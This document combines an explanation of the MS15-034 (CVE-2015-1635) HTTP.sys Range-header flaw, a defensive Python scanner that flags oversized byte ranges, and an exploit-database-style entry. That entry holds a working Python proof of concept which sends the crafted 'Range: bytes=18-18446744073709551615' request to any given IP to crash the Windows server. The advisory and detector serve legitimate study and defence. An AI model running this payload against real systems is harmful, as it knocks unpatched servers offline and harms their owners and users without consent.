Microsoft Windows (HTTP.sys) HTTP Request Parsing DoS (MS15-034)

CVE-2015-1635 identifies the latest vulnerability found in HTTP.sys of Microsoft’s Windows operating system (OS). It affects all applications that use this service: HTTP.sys is susceptible to Denial-of-Service (DoS) and potentially remote code execution via an ‘HTTP range request’.

The HTTP Range request allows clients to fetch a specific offset within a file on the HTTP server. It is commonly used to resume failed or interrupted downloads: a user who has downloaded only half of a 1KB file can continue downloading the remainder of the file by setting the Range in the HTTP header to '512-1024'.

To exploit the vulnerability, the attacker can send a specially crafted HTTP request with the header Range: bytes=18-18446744073709551615. The server will then create the necessary kernel cache to accommodate the Range request. This causes the system to attempt to reach an unreachable address, which causes an integer overflow and blue-screens the victim's system.
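
A defender-side check for the Range header described above, as an added example that is not part of the original advisory or PoC: it parses the byte ranges and flags positions no real file could have. The 2**63 threshold, the function names and the sample requests are assumptions made for this example.

```python
import re

# Assumption: no legitimate resource is 2**63 bytes or larger, so any byte
# position at or above this value is treated as hostile.
SUSPICIOUS_POS = 2**63
RANGE_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")

def parse_byte_ranges(value):
    """Parse a Range header value into (first, last) pairs; None = omitted."""
    unit, sep, specs = value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        raise ValueError("not a bytes range")
    ranges = []
    for spec in specs.split(","):
        m = RANGE_SPEC.match(spec)
        if not m or not (m.group(1) or m.group(2)):
            raise ValueError("malformed range-spec: %r" % spec)
        first, last = (int(g) if g else None for g in m.groups())
        ranges.append((first, last))
    return ranges

def classify_range(value):
    """Return 'ok', 'malformed' or 'suspicious' for one Range header value."""
    try:
        ranges = parse_byte_ranges(value)
    except ValueError:
        return "malformed"
    for first, last in ranges:
        if any(p is not None and p >= SUSPICIOUS_POS for p in (first, last)):
            return "suspicious"
        if first is not None and last is not None and first > last:
            return "malformed"
    return "ok"

def scan_requests(raw_requests):
    """Return (request_line, verdict) for each request with a Range header."""
    hits = []
    for raw in raw_requests:
        head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
        for line in head[1:]:
            name, _, val = line.partition(":")
            if name.strip().lower() == "range":
                hits.append((head[0], classify_range(val.strip())))
    return hits

# Constructed sample requests (not captured traffic).
SAMPLES = [
    "GET /file.bin HTTP/1.1\r\nHost: example.test\r\nRange: bytes=512-1023\r\n\r\n",
    "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n",
    "GET /a HTTP/1.1\r\nHost: example.test\r\nRange: bytes=-500, 0-99\r\n\r\n",
]
```
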

Full title: Microsoft Windows (HTTP.sys) HTTP Request Parsing DoS (MS15-034)
Date added: 17-04-2015
Category: dos / poc
Platform: windows
Security Risk: High
CVE: CVE-2015-1635

# Tested on Windows Server 2012 R2.

import socket,sys

if len(sys.argv)<=1:
 sys.exit('Give me an IP')
 
Host = sys.argv[1]
 
def SendPayload(Payload, Host):
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((Host, 80))
   s.send(Payload)
   s.recv(1024)
   s.close()
 
# Make sure iisstart.htm exists.
Init = "GET /iisstart.htm HTTP/1.0\r\n\r\n"
Payload = "GET /iisstart.htm HTTP/1.1\r\nHost: blah\r\nRange: bytes=18-18446744073709551615\r\n\r\n"
 
SendPayload(Init, Host)
SendPayload(Payload, Host)